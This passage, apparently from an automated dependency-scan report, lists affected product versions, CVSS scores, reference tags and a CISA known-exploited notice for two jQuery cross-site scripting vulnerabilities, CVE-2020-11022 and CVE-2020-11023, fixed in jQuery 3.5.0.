cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_retail_customer_analytics:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_performance_insight:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper_and_adf:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:* versions from (including) 8.6.0; versions up to (including) 8.6.3 cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.15 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2.0; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:primavera_gateway:15.2.18:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.7; versions up to (including) 17.12 cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:real-time_scheduler:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_mobile_applications:*:*:*:*:*:*:*:* versions up to (including) 19.8 cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:system_utilities:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:tape_library_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:transportation_management:1.4.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:utilities_mobile_workforce_management:*:*:*:*:*:*:*:* versions from (including) 2.3.0.1; versions up to (including) 2.3.0.3 cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:redhat:cloudforms:4.7:*:*:*:*:*:*:* cpe:2.3:a:redhat:virtualization_manager:4.3:*:*:*:*:*:*:* CVE-2020-11022 suppress
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MITIGATION,THIRD_PARTY_ADVISORY security-advisories@github.com - MITIGATION,VENDOR_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - RELEASE_NOTES,VENDOR_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.2; versions up to (excluding) 3.5.0 cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_supplier_collaboration_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:*:*:*:*:*:*:*:* versions from (including) 18.1; versions up to (including) 20.1 cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2 cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\::*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.2.2 cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.6.0.0; versions up to (including) 8.1.0.0.0 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.8 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.0.9 cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:* versions from (including) 19.1.0; versions up to (including) 19.1.2 cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_simphony:19.1.0-19.1.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:* versions from (including) 8.0.6; versions up to (including) 8.1.0 cpe:2.3:a:oracle:insurance_data_foundation:8.0.6-8.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:* versions from (including) 5.0.0.0; versions up to (including) 5.6.0.0 cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:* versions from (including) 12.2.0; versions up to (including) 12.2.20 cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9 CVE-2020-11023 suppress
CISA Known Exploited Vulnerability: Product: JQuery JQuery Name: JQuery Cross-Site Scripting (XSS) Vulnerability Date Added: 2025-01-23 Description: JQuery contains a persistent cross-site scripting (XSS) vulnerability. When passing maliciously formed, untrusted input enclosed in HTML tags, JQuery's DOM manipulators can execute untrusted code in the context of the user's browser. Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Due Date: 2025-02-13 Notes: https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ ; https://nvd.nist.gov/vuln/detail/CVE-2020-11023
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST 